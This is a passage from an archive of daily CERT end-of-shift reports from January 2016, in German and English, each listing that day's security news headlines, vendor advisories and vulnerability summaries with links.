CVE-2015-3195, CVE-2015-3196) *** http://www.ibm.com/support/docview.wss?uid=swg21974459 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Spectrum Scale (CVE-2015-4843, CVE-2015-4805, CVE-2015-4810, CVE-2015-4806, CVE-2015-4871, CVE-2015-4902) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005579 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM API Management (CVE-2015-4872 CVE-2015-4911 CVE-2015-4893 CVE-2015-4803) *** http://www.ibm.com/support/docview.wss?uid=swg21974673 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SD affect Guardium Data Reduction *** http://www.ibm.com/support/docview.wss?uid=swg21973724 --------------------------------------------- *** IBM Security Bulletin:Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Composite Application Manager for Transactions (Multiple CVEs) *** http://www.ibm.com/support/docview.wss?uid=swg21971951 --------------------------------------------- *** IBM Security Bulletin: Multiple Security Vulnerabilities exist in IBM Cognos Express. *** http://www.ibm.com/support/docview.wss?uid=swg21972376 ---------------------------------------------

1 0

Tageszusammenfassung - Dienstag 19-01-2016
by Daily end-of-shift report 19 Jan '16

19 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 18-01-2016 18:00 − Dienstag 19-01-2016 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** FDA Issues Guidelines on Medical Device Cybersecurity *** --------------------------------------------- The Food and Drug Administration (FDA) issued a new set of draft guidelines on Friday in hopes medical device manufacturers address cybersecurity risks in their products. --------------------------------------------- http://threatpost.com/fda-issues-guidelines-on-medical-device-cybersecurity… *** Good practice guide on disclosing vulnerabilities *** --------------------------------------------- ENISA published a good practice guide on vulnerability disclosure, aiming to provide a picture of the challenges the security researchers, the vendors and other involved stakeholders are confronted wi... --------------------------------------------- http://www.net-security.org/secworld.php?id=19342 *** Microsoft asks: We've taken down botnets for you. How about a kill switch? *** --------------------------------------------- Its like pulling a smoking car off the road... Oh, hang on Last December, Microsoft intercepted traffic on users' PCs and helped break up a botnet. And nobody complained. So the company very tentatively asked at a session on ethics and policy in Brussels this week whether it should do more. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/01/19/microsoft_b… *** Security: XSS-Lücke in Yahoo-Mail gefixt *** --------------------------------------------- Eine XSS-Lücke in Yahoo-Mail ermöglichte es Angreifern, fremde Accounts zu übernehmen. Sie hätten alle E-Mails der Nutzer weiterleiten und ausgehende E-Mails mit Viren infizieren können, schreibt ein Sicherheitsforscher. Yahoo hat bereits reagiert. --------------------------------------------- http://www.golem.de/news/security-xss-luecke-in-yahoo-mail-gefixt-1601-1186… *** Angler Exploit Kit's January Vacation *** --------------------------------------------- Since last year, we've been monitoring various redirectors which lead to exploit kits (EK). One of the redirectors in question routes to either Angler EK or Neutrino EK. SANS ISC has also observed this particular redirector switching between these two kits. At the beginning of this year, we noticed a sudden significant drop in our... --------------------------------------------- https://labsblog.f-secure.com/2016/01/19/angler-exploit-kits-january-vacati… *** Root-Exploit: Android und Linux anfällig für Rechte-Trickserei *** --------------------------------------------- Der Schlüsselbund des Kernels stattet mit einem Trick seit 2012 jeden Nutzer mit Root-Rechten aus. Allerdings muss der Nutzer dafür bereits angemeldet sein. --------------------------------------------- http://heise.de/-3076663 *** MSN Home Page Drops More Malware Via Malvertising *** --------------------------------------------- Visitors to the MSN homepage may have been exposed to malvertising.Categories: MalvertisingTags: ad spiritappnexusmalvertisingmsn(Read more...) --------------------------------------------- https://blog.malwarebytes.org/malvertising-2/2016/01/msn-home-page-drops-mo… *** Cisco Web Security Appliance Security Bypass Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Moodle Bugs Let Remote Users Access Hidden Course and Conduct Cross-Site Scripting Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1034694

1 0

Tageszusammenfassung - Montag 18-01-2016
by Daily end-of-shift report 18 Jan '16

18 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 15-01-2016 18:00 − Montag 18-01-2016 18:00 Handler: Stephan Richter Co-Handler: Alexander Riepl *** Cisco FireSIGHT Management Center Stored Cross-Site Scripting Vulnerabilities *** --------------------------------------------- Multiple vulnerabilities in the web framework of Cisco FireSIGHT Management Center could allow an unauthenticated, remote attacker to execute a stored cross-site scripting (XSS) attack against a user of the Cisco FireSIGHT Management Center web interface. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Easily Exploitable Vulnerability Could Cause Physical Damage to Industrial Motors *** --------------------------------------------- http://www.sans.org/newsletters/newsbites/r/18/4/307 *** Cisco FireSIGHT Management Center DOM-Based Cross-Site Scripting Vulnerability *** --------------------------------------------- Cisco FireSIGHT Management Center (MC) contains a DOM-based cross-site scripting vulnerability (XSS) in the management page. An unauthenticated, remote attacker could persuade a user to perform a malicious action, allowing the attacker to perform a XSS attack. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** IBM Security Bulletin: Vulnerabilities in GNU grep utility affect IBM Security Network Protection (CVE-2012-5667, and CVE-2015-1345) *** --------------------------------------------- The grep utility searches through textual input for lines that contain a match to a specified pattern and then prints the matching lines. Security vulnerabilities have been discovered in grep utility used with IBM Security Network Protection. --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21972209 *** IBM Security Bulletin: IBM WebSphere Application Server Liberty Profile vulnerability affects IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2015-2017) *** --------------------------------------------- WebSphere Application Server Liberty Profile that is embedded in TADDM could allow a remote attacker to has access to the customer app or a form which sends the contents in a header will be able to split the response and add headers to the response. The customer application will allow cross-site scripting, web cache poisoning, and other similar exploits. --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21974782 *** Cisco Adaptive Security Appliance Information Disclosure Vulnerability *** --------------------------------------------- A vulnerability in the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to access sensitive data. The attacker could use this information to conduct additional attacks. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** The SLOTH attack and IKE/IPsec *** --------------------------------------------- The IKE daemons in RHEL7 (libreswan) and RHEL6 (openswan) are not vulnerable to the SLOTH attack. But the attack is still interesting to look at . The SLOTH attack released today is a new transcript collision attack against .. --------------------------------------------- https://securityblog.redhat.com/2016/01/15/the-sloth-attack-and-ikeipsec/ *** Schwere Lücke bei Überwachungskameras von Hofer und Aldi *** --------------------------------------------- Sicherheitsexperten warnen vor Überwachungskameras der Marke Maginon. Diese erlauben den ungeschützten Zugriff auf Bild und Ton, aber auch WLAN- und E-Mail-Passwörter. --------------------------------------------- http://futurezone.at/produkte/schwere-luecke-bei-ueberwachungskameras-von-h… *** LostPass *** --------------------------------------------- I have discovered a phishing attack against LastPass that allows an attacker to steal a LastPass users email, password, and even two-factor auth code, giving full access to all passwords and documents stored in LastPass. --------------------------------------------- https://www.seancassidy.me/lostpass.html *** Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 - and a new network attack *** --------------------------------------------- Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing. --------------------------------------------- http://foxglovesecurity.com/2016/01/16/hot-potato/ *** HTTP Evasions Explained - Part 10 - Lazy Browsers *** --------------------------------------------- The previous parts of this series looked at firewalls and browsers as black boxes which just behave that way for unknown reason. For this part I took a closer look at the source code of Chromium and Firefox. This way Ive found even more ways to construct HTTP which is insanely broken but still gets accepted by the .. --------------------------------------------- http://noxxi.de/research/http-evader-explained-10-lazy-browsers.html *** nic.at bringt "Security-Lock" für Domains *** --------------------------------------------- Schutz soll verhindern, dass eine Domain irrtümlich unerreichbar oder manipuliert wird --------------------------------------------- http://derstandard.at/2000029286062

1 0

Tageszusammenfassung - Freitag 15-01-2016
by Daily end-of-shift report 15 Jan '16

15 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 14-01-2016 18:00 − Freitag 15-01-2016 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** NCCIC/ICS-CERT Monitor for November-December 2015 *** --------------------------------------------- The NCCIC/ICS-CERT Monitor for November-December 2015 is a summary of ICS-CERT activities for that period of time. --------------------------------------------- https://ics-cert.us-cert.gov/monitors/ICS-MM201512 Download: https://ics-cert.us-cert.gov/sites/default/files/Monitors/ICS-CERT%20Monito… *** Oracle Critical Patch Update - January 2016 - Pre-Release Announcement *** --------------------------------------------- [...] This Critical Patch Update contains 248 new security vulnerability fixes across hundreds of Oracle products. Some of the vulnerabilities addressed in this Critical Patch Update affect multiple products. Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply Critical Patch Update fixes as soon as possible. --------------------------------------------- http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html *** Creator of MegalodonHTTP DDoS Botnet Arrested *** --------------------------------------------- Last month, the Norway police arrested five hackers accused of running the MegalodonHTTP Remote Access Trojan (RAT). The arrests came as part of the joint operation between Norway's Kripos National Criminal Investigation Service and Europol, codenamed "OP Falling sTAR." According to the United States security firm, all the five men, aged between 16 and 24 years and located in Romania,... --------------------------------------------- https://thehackernews.com/2016/01/MegalodonHTTP-DDoS-Botnet.html *** Kreditkartenhack bei VISA: Unter anderem A1-Kunden betroffen *** --------------------------------------------- Ein Drittanbieter in Island wurde angegriffen - rund 2.000 A1 Visa-Kunden erhalten neue Karte --------------------------------------------- http://derstandard.at/2000029114201 *** Updated BlackEnergy Trojan Grows More Powerful *** --------------------------------------------- In late December, a cyberattack caused a power outage in the Ukraine, plunging hundreds of thousands of citizens into darkness for hours. Threat researchers soon confirmed that the BlackEnergy malware package, first developed in 2007, was the culprit. They also discovered that the malware has been significantly upgraded since its first release. --------------------------------------------- https://blogs.mcafee.com/mcafee-labs/updated-blackenergy-trojan-grows-more-… *** Wieder sicher: Authentifizierungsprotokoll OAuth *** --------------------------------------------- Angreifer sollen abermals Log-in-Daten von Nutzern abgreifen können, wenn diese sich mittels OAuth bei Online-Services anmelden. Die Schwachstellen wurden bereits geschlossen. Sicherheitsforscher attestieren dem Protokoll insgesamt eine hohe Sicherheit. --------------------------------------------- http://heise.de/-3071639 *** Spamming Someone from PayPal *** --------------------------------------------- Troy Hunt has identified a new spam vector. PayPal allows someone to send someone else a $0 invoice. The spam is in the notes field. But its a legitimate e-mail from PayPal, so it evades many of the traditional spam filters. Presumably it doesnt cost anything to send a $0 invoice via PayPal. Hopefully, the company will close this loophole... --------------------------------------------- https://www.schneier.com/blog/archives/2016/01/spamming_someon.html *** OS Xs Gatekeeper bypassed again *** --------------------------------------------- Do you remember when, last October, Synack director of research Patrick Wardle found a simple way to evade OS Xs Gatekeeper defense mechanism by bundling up a legitimate Apple-signed app with a malic... --------------------------------------------- http://www.net-security.org/secworld.php?id=19336 *** Advantech WebAccess Vulnerabilities *** --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 *** Manage Engine Applications Manager 12 Multiple Vulnerabilities *** --------------------------------------------- Applications Manager suffers from multiple vulnerabilities including XSS, CSRF and Privilege Escalation. --------------------------------------------- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5292.php

1 0

Tageszusammenfassung - Donnerstag 14-01-2016
by Daily end-of-shift report 14 Jan '16

14 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 13-01-2016 18:00 − Donnerstag 14-01-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** SlemBunk Part II: Prolonged Attack Chain and Better-Organized Campaign *** --------------------------------------------- Our follow-up investigation of a nasty Android banking malware we identified at the tail end of last year has not only revealed that the trojan is more persistent than we initially realized - thus making for a much more dangerous threat - but that it is also being used as part of an ongoing and evolving campaign. --------------------------------------------- https://www.fireeye.com/blog/threat-research/2016/01/slembunk-part-two.html *** Faulty ransomware renders files unrecoverable, even by the attacker *** --------------------------------------------- A cybercriminal has built a ransomware program based on proof-of-concept code released online, but messed up the implementation, resulting in victims files being completely unrecoverable.Researchers from antivirus vendor Trend Micro recently .. --------------------------------------------- http://www.cio.com/article/3022159/faulty-ransomware-renders-files-unrecove… *** As easy as Citrix123 - hacker claims he popped Citrixs CMS *** --------------------------------------------- And once he was in, it became possible to pour malware onto all customers, allegedly A Russian hacker claims he broke into systems run by Citrix, and gained access to potentially a huge number of customers. --------------------------------------------- www.theregister.co.uk/2016/01/13/ruskie_hacker_pops_citrix/ *** Ex-NSA-Chef: Hintertüren für Verschlüsselung sind eine furchtbare Idee *** --------------------------------------------- Michael Hayden widerspricht den Forderungen von FBI-Boss James Comey --------------------------------------------- http://derstandard.at/2000029033330 *** RedHen CRM - Moderately Critical - Cross Site Scripting (XSS) - SA-CONTRIB-2016-002 *** --------------------------------------------- The Redhen set of modules allows you to build a CRM features in a Drupal site.When rendering individual Contacts, this module does not properly filter the certain data prior to display. When rendering listing of notes or engagement scores, .. --------------------------------------------- https://www.drupal.org/node/2649800 *** Cisco kämpft mit statischem Passwort und fixt kritische Lücken *** --------------------------------------------- In Ciscos Identity Services Engine klafft eine als kritisch und eine als hoch eingestufte Schwachstelle. Neben der Wireless-LAN-Controller-Software sind auch noch Aironet-Basisstationen der 1800-Serie verwundbar. Sicherheitsupdates stehen bereit. --------------------------------------------- http://heise.de/-3070756 *** Angriff der Cyber-Eichhörnchen *** --------------------------------------------- Eichhörnchen sind eine größere Gefahr für Internet- und Stromleitungen als Hacker. Das zeigt die Webseite CyberSquirrel1 auf augenzwinkernde Art und Weise. --------------------------------------------- http://www.golem.de/news/internet-und-stromausfaelle-angriff-der-cyber-eich… *** OpenSSL version 1.1.0 pre release 2 published *** --------------------------------------------- OpenSSL 1.1.0 is currently in alpha. OpenSSL 1.1.0 pre release 2 has now been made available. For details of changes and known issues see the release .. --------------------------------------------- https://mta.openssl.org/pipermail/openssl-announce/2016-January/000057.html *** Triple-Seven: OpenSSH-Schwachstelle leakt geheime Schlüssel *** --------------------------------------------- Eine unfertige Option, die bei OpenSSH seit 2010 standardmäßig aktiviert ist, führt dazu, dass gekaperte Server die geheimen Schlüssel der sich verbindenden Nutzer auslesen können. Updates, welche die Lücke schließen, stehen bereit. --------------------------------------------- http://heise.de/-3071372 *** Ransomware a Threat to Cloud Services, Too *** --------------------------------------------- Ransomware -- malicious software that encrypts the victims files and holds them hostage unless and until the victim pays a ransom in Bitcoin -- has emerged as a potent and increasingly common threat online. But many Internet users are unaware that ransomware also can just as easily seize control over files stored on cloud services. --------------------------------------------- http://krebsonsecurity.com/2016/01/ransomware-a-threat-to-cloud-services-to…

1 0

Tageszusammenfassung - Mittwoch 13-01-2016
by Daily end-of-shift report 13 Jan '16

13 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 12-01-2016 18:00 − Mittwoch 13-01-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Security Bulletins Posted for Adobe Acrobat and Reader *** --------------------------------------------- Security Bulletins for Adobe Acrobat and Reader (APSB16-02) have been published. These updates address critical vulnerabilities, and Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant security bulletin. This posting .. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1311 *** There Goes The Neighborhood - Bad Actors on GMHOST Alexander Mulgin Serginovic *** --------------------------------------------- Whether they encourage it or not, some network operators become known and favored by criminals such as those that operate exploit kit (EK) and malware infrastructure. After .. --------------------------------------------- http://research.zscaler.com/2016/01/there-goes-neighborhood-bad-actors-on.h… *** MS16-JAN - Microsoft Security Bulletin Summary for January 2016 - Version: 1.0 *** --------------------------------------------- https://technet.microsoft.com/en-us/library/security/MS16-JAN *** Raising the Dead *** --------------------------------------------- It's a bit late for Halloween but the ability to resurrect the dead (processes that is) is an interesting type of security issue when dealing with multi-user Windows systems such as Terminal Servers. Specifically this blog is about this issue which I reported to Microsoft and was fixed in bulletin .. --------------------------------------------- http://googleprojectzero.blogspot.com/2016/01/raising-dead.html *** FortiOS SSH Undocumented Interactive Login Vulnerability *** --------------------------------------------- http://www.fortiguard.com/advisory/fortios-ssh-undocumented-interactive-log… *** Ransomware Strikes Websites *** --------------------------------------------- Ransomware is one of the most insidious types of malware that one can come across. These infections will encrypt all files on the target computer as well as any hard drives connected to the machine - pictures, videos, text files - you .. --------------------------------------------- https://blog.sucuri.net/2016/01/ransomware-strikes-websites.html *** Triaging the exploitability of IE/EDGE crashes *** --------------------------------------------- Both Internet Explorer (IE) and Edge have seen significant changes in order to help protect customers from security threats. This work has featured a number of mitigations that together have not only rendered classes of vulnerabilities not-exploitable, but also dramatically raised the cost .. --------------------------------------------- http://blogs.technet.com/b/srd/archive/2016/01/12/triaging-the-exploitabili… *** Die smarte Türklingel verrät das WLAN-Passwort *** --------------------------------------------- Eine Gegensprechanlage, die mit dem Smartphone zusammenarbeitet. Klingt eigentlich praktisch, doch leider weist das Gerät Sicherheitsmängel auf, wie Hacker jetzt herausfanden. --------------------------------------------- http://www.golem.de/news/internet-of-things-die-smarte-tuerklingel-verraet-… *** Backdoor bei Fortinet vermutet: Firma spricht von Lücke *** --------------------------------------------- Alternative Login-Methode in Software entdeckt – Patch bereits 2014 veröffentlicht --------------------------------------------- http://derstandard.at/2000028972976 *** A Case of Too Much Information: Ransomware Code Shared Publicly for 'Educational Purposes', Used Maliciously Anyway *** --------------------------------------------- Researchers, whether independent or from security vendors, have a responsibility to properly disseminate the information they gathered to help the industry as well as users. Even with the best intentions, improper disclosure of sensitive information .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/a-case-of-too-mu… *** Security: Verizon routet 4 Millionen Spammer-IPs *** --------------------------------------------- IPv4-Adressen sind ein knappes Gut. Doch der US-Anbieter Verizon reagiere trotzdem nicht auf Missbrauchsmitteilungen, kritisiert eine Sicherheitsfirma. --------------------------------------------- http://www.golem.de/news/security-verizon-routet-4-millionen-spammer-ips-16… *** [HTB23279]: Multiple SQL Injection Vulnerabilities in mcart.xls Bitrix Module *** --------------------------------------------- High-Tech Bridge Security Research Lab discovered multiple SQL Injection vulnerabilities in mcart.xls Bitrix module, which can be exploited to execute arbitrary SQL queries and obtain potentially sensitive data, modify information in database and gain complete control over the vulnerable website. --------------------------------------------- https://www.htbridge.com/advisory/HTB23279 *** [HTB23283]: Remote Code Execution in Roundcube *** --------------------------------------------- High-Tech Bridge Security Research Lab discovered a path traversal vulnerability in a popular webmail client Roundcube. Vulnerability can be exploited to gain access to sensitive information and under certain circumstances to execute arbitrary code and totally compromise the vulnerable server. --------------------------------------------- https://www.htbridge.com/advisory/HTB23283 *** Hacking Team's Leak Helped Researchers Hunt Down a Zero-Day *** --------------------------------------------- Researchers at Kaspersky Lab have, for the first time, discovered a valuable zero-day exploit after intentionally going on the hunt for it. --------------------------------------------- http://www.wired.com/2016/01/hacking-team-leak-helps-kaspersky-researchers-… *** Denial-of-Service Flaw Patched in DHCP *** --------------------------------------------- The Internet Systems Consortium (ISC) on Tuesday patched a denial-of-service vulnerability in numerous versions of DHCP. --------------------------------------------- http://threatpost.com/denial-of-service-flaw-patched-in-dhcp/115875/ *** The SLOTH attack and IKE/IPsec *** --------------------------------------------- Executive Summary: The IKE daemons in RHEL7 (libreswan) and RHEL6 (openswan) are not vulnerable to the SLOTH attack. But the attack is still interesting to look at . The SLOTH attack released today is a new transcript collision attack against .. --------------------------------------------- https://securityblog.redhat.com/2016/01/13/the-sloth-attack-and-ikeipsec/

1 0

Tageszusammenfassung - Dienstag 12-01-2016
by Daily end-of-shift report 12 Jan '16

12 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 11-01-2016 18:00 − Dienstag 12-01-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Angler Exploit Kit Continues to Evade Detection: Over 90,000 Websites Compromised *** --------------------------------------------- Exploit Kits (EK), arguably the most impactful malicious infrastructure on the Internet, constantly evolve to evade detection by security technology. Tremendous effort has been spent on tracking new variations of different EK families. In .. --------------------------------------------- http://researchcenter.paloaltonetworks.com/2016/01/angler-exploit-kit-conti… *** Mac OS X, iOS, and Flash Had the Most Discovered Vulnerabilities in 2015 *** --------------------------------------------- Interesting analysis: Which software had the most publicly disclosed vulnerabilities this year? The winner is none other than Apples Mac OS X, with 384 vulnerabilities. The runner-up? Apples iOS, with 375 vulnerabilities. Rounding out the top five are Adobes Flash Player, with 314 vulnerabilities; Adobes AIR .. --------------------------------------------- https://www.schneier.com/blog/archives/2016/01/mac_os_x_ios_an.html *** DSA-3440 sudo - security update *** --------------------------------------------- When sudo is configured to allow a user to edit files under a directory that they can already write to without using sudo, they can actuallyedit (read and write) arbitrary files. Daniel Svartman reported that aconfiguration like this might .. --------------------------------------------- https://www.debian.org/security/2016/dsa-3440 *** Ransom32 - look at the malicious package *** --------------------------------------------- Ransom32 is a new ransomware implemented in a very atypical style. In our post, we will focus on some implementation details of the malicious package. --------------------------------------------- https://blog.malwarebytes.org/intelligence/2016/01/ransom32-look-at-the-mal… *** Say 'Cyber' again - Ars cringes through CSI: Cyber *** --------------------------------------------- CBS endangered cyber-procedural: Plane hacking! Software defined radio! White noise! OMG! --------------------------------------------- http://arstechnica.com/the-multiverse/2016/01/say-cyber-again-ars-cringes-t… *** McAfee Application Control - The dinosaurs want their vuln back *** --------------------------------------------- The experts of the SEC Consult Vulnerability Lab conducted research in the field of the security of application whitelisting in critical infrastructures. In the course of that research the security of McAfee Application Control was checked.The experts developed several methods to bypass the provided protections .. --------------------------------------------- http://blog.sec-consult.com/2016/01/mcafee-application-control-dinosaurs.ht… *** (ISC)2 SecureAustria *** --------------------------------------------- How can we know what we are protecting if we struggle to understand and keep up with how we and our organizations are changing? It�s time to get a grip on the far-reaching and fundamental changes that are occurring in business today. --------------------------------------------- https://www.sba-research.org/events/isc2-secureaustria/ *** Sicherheit: Aus für alte IE-Versionen trifft jeden fünften Webnutzer *** --------------------------------------------- Über die Jahre hat Microsoft eine Fülle unterschiedlicher Versionen des Internet Explorers veröffentlicht. Nun entledigt man sich der Support-Pflichten für einen großen Teil derselben: Ab sofort liefert Microsoft keinerlei Updates mehr für Internet Explorer 8 bis 10. --------------------------------------------- http://derstandard.at/2000028882047 *** Cops Say They Can Access Encrypted Emails on So-Called PGP BlackBerrys *** --------------------------------------------- Dutch investigators have confirmed to Motherboard that they are able to read encrypted messages sent on PGP BlackBerry phones�custom, security-focused BlackBerry devices that come complete with an encrypted email feature, and which reportedly may be used by organized criminal groups. --------------------------------------------- https://motherboard.vice.com/read/cops-say-they-can-access-encrypted-emails… *** Ongoing Sophisticated Malware Campaign Compromising ICS (Update C) *** --------------------------------------------- This alert update is a follow-up to the updated NCCIC/ICS-CERT Alert titled ICS-ALERT-14-281-01B Ongoing Sophisticated Malware Campaign Compromising ICS that was published December 10, 2014, on the ICS-CERT web site. | ICS-CERT has identified a sophisticated malware campaign that has compromised numerous .. --------------------------------------------- https://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-281-01B *** Experts warn Neutrino and RIG exploit kit activity spike *** --------------------------------------------- Security experts at Heimdal Security are warning a spike in cyber attacks leveraging the popular Neutrino and RIG exploit kit. Cyber criminals always exploit new opportunities and users' bad habits, now crooks behind the recent campaigns relying on Neutrino and RIG exploit kits are ramping up attacks .. --------------------------------------------- http://securityaffairs.co/wordpress/43482/cyber-crime/neutrino-rig-exploit-… *** Group using DDoS attacks to extort business gets hit by European law enforcement *** --------------------------------------------- On 15 and 16 December, law enforcement agencies from Austria, Bosnia and Herzegovina, Germany and the United Kingdom joined forces with Europol in the framework of an operation against the ... --------------------------------------------- http://www.net-security.org/secworld.php?id=19314 *** Schwere Sicherheitslücken im Passwort-Manager von Trend Micro *** --------------------------------------------- Google-Forscher Tavis Ormandy deckt wieder einmal Schwachstellen in Anti-Viren-Software auf. Bei Trend Micro stellt er konsterniert fest: "Das Lächerlichste, was ich je gesehen habe." --------------------------------------------- http://heise.de/-3069140 *** UPC: Standard-WLAN-Passwörter kinderleicht zu knacken *** --------------------------------------------- Neuer Hack erlaubt Berechnung basierend auf der ESSID – UPC prüft Klage gegen Sicherheitsforscher. --------------------------------------------- http://derstandard.at/2000028921659 *** An Easy Way for Hackers to Remotely Burn Industrial Motors *** --------------------------------------------- Devices that control the speed of industrial motors operating water plant pumps and other equipment can be remotely hacked and destroyed. --------------------------------------------- http://www.wired.com/2016/01/an-easy-way-for-hackers-to-remotely-burn-indus…

1 0

Tageszusammenfassung - Montag 11-01-2016
by Daily end-of-shift report 11 Jan '16

11 Jan '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 08-01-2016 18:00 − Montag 11-01-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** GM Asks Friendly Hackers to Report Its Cars' Security Flaws *** --------------------------------------------- The auto giant becomes the first in Detroit to extend an olive branch to car hackers. --------------------------------------------- http://www.wired.com/2016/01/gm-asks-friendly-hackers-to-report-its-cars-se… *** STIX - Looking at a Campaign, Part 1 *** --------------------------------------------- Now we come to a useful application of STIX: characterizing a campaign. --------------------------------------------- http://www.scmagazine.com/stix--looking-at-a-campaign-part-1/article/464093/ *** ZDI-16-007: McAfee Application Control Kernel Driver Memory Corruption Privilege Escalation Vulnerability *** --------------------------------------------- This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of McAfee Application Control. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-16-007/ *** Advancing the Security of Juniper Products *** --------------------------------------------- BOB WORRALL, SVP CHIEF INFORMATION OFFICER makes provides more detail on the ScreenOS investigation and security steps being taken with Junos and across Juniper. --------------------------------------------- http://forums.juniper.net/t5/Security-Incident-Response/Advancing-the-Secur… *** Virtual Bitlocker Containers, (Sat, Jan 9th) *** --------------------------------------------- This week, I gotan interestingquestion from a customer: What do you recommend to safely store files in a directoryon my laptop?. They are plenty of ways to achievethis, the right choice depending on the encryption reliability, the ease of use and .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20593 *** MMD-0049-2016 - A case of java trojan (downloader/RCE) for remote minerd hack *** --------------------------------------------- This is a short post for supporting the takedown purpose. Warning: Sorry, theres nothing fancy nor "in-depth analysis" in here :-) The scheme is so bad, so I think its best for all to know for mitigation and hardening purpose. In this case, a bad actor was .. --------------------------------------------- http://blog.malwaremustdie.org/2016/01/mmd-0049-2016-case-of-java-trojan.ht… *** Studie: Mittelstand unterschätzt Gefahr durch Cyber-Kriminalität *** --------------------------------------------- Die Schäden steigen, das Bewusstsein für IT-Sicherheit nicht: Laut einer Studie schützen sich Mittelständler nur unzureichend gegen IT-Angriffe. Dabei zwingt sie der Gesetzgeber längst zum Handeln. --------------------------------------------- http://heise.de/-3067640 *** Jänner-Update: Google schließt kritische Lücken in Android *** --------------------------------------------- Google scheint seinen Sicherheits-Update-Rhythmus gefunden zu haben – zumindest wenn es um die eigenen Geräte geht. Aktuell liefert Google das Jänner-Update für Android an die Smartphones und Tablets der Nexus-Linie aus. --------------------------------------------- http://derstandard.at/2000028786638 *** NSA-Spionagevorwürfe: Juniper verspricht weitere Updates *** --------------------------------------------- Vom US-Geheimdienst eingebrachter Zufallszahlengenerator wird aus Netzwerk-Betriebssystem entfernt --------------------------------------------- http://derstandard.at/2000028789875 *** A Look Inside Cybercriminal Call Centers *** --------------------------------------------- Crooks who make a living via identity theft schemes, dating scams and other con games often run into trouble when presented with a phone-based challenge that requires them to demonstrate mastery of a language they dont speak fluently. Enter the .. --------------------------------------------- http://krebsonsecurity.com/2016/01/a-look-inside-cybercriminal-call-centers/ *** Android: Schadsoftware aus Play Store hunderttausendfach installiert *** --------------------------------------------- Geht es um Android-Malware fällt der Ratschlag für die Nutzer meist recht simpel aus: Wer auf die Installation von Apps aus unsicheren Quellen verzichtet, ist üblicherweise auch nicht gefährdet. Doch in einem aktuellen Fall ist es Angreifern nun gelungen, die Sicherheitschecks des Play Store auszutricksen. --------------------------------------------- http://derstandard.at/2000028774967 *** Hackerangriff auf Rechenzentrumsbetreiber Interxion *** --------------------------------------------- Im Dezember kam es zu einem Einbruch auf das eigene CRM-System --------------------------------------------- http://derstandard.at/2000028816801 *** Klickbetrug: Unter dem Deckmantel der Cookie-Warnung *** --------------------------------------------- Online-Gauner verstecken sich im wahrsten Sinne des Wortes hinter Cookie-Warnungen und sammeln so Klicks auf Werbeanzeigen ein. --------------------------------------------- http://heise.de/-3067995 *** OAuth2 & OpenID - HTTPS Bicycle Attack *** --------------------------------------------- The OAuth 2.0 protocol allows users to grant relying parties access to resources at identity providers. In addition to being used for this kind of authorization, OAuth is also often employed for authentication in single sign-on (SSO) systems. OAuth 2.0 is, in fact, one of the most widely used .. --------------------------------------------- https://cxsecurity.com/issue/WLB-2016010064 *** PHP-Updates über alle Versionen beheben einige Sicherheitsprobleme *** --------------------------------------------- Die Macher der Skriptsprache empfehlen den Nutzern von PHP 7.0, 5.5 und 5.6 die Installation der aktuellen Security-Releases. Gleichzeitig gibt ein Blick auf GitHub und das PHP-Wiki eine Vorschau auf kommende Funktionen in PHP 7.1. --------------------------------------------- http://heise.de/-3068170 *** DSA-3438 xscreensaver - security update *** --------------------------------------------- It was discovered that unplugging one of the monitors in a multi-monitorsetup can cause xscreensaver to crash. Someone with physical access toa machine could use this problem to bypass a locked session. --------------------------------------------- https://www.debian.org/security/2016/dsa-3438 *** Unverschlüsselte CMS-Updates: Drupal gelobt Besserung *** --------------------------------------------- Das Update-Verfahren des beliebten Content Management Systems Drupal liefert Aktualisierungen unverschlüsselt aus. Ein Problem, das seit Jahren bekannt ist und von Angreifern missbraucht werden kann, um Seiten zu kapern. --------------------------------------------- http://heise.de/-3068105 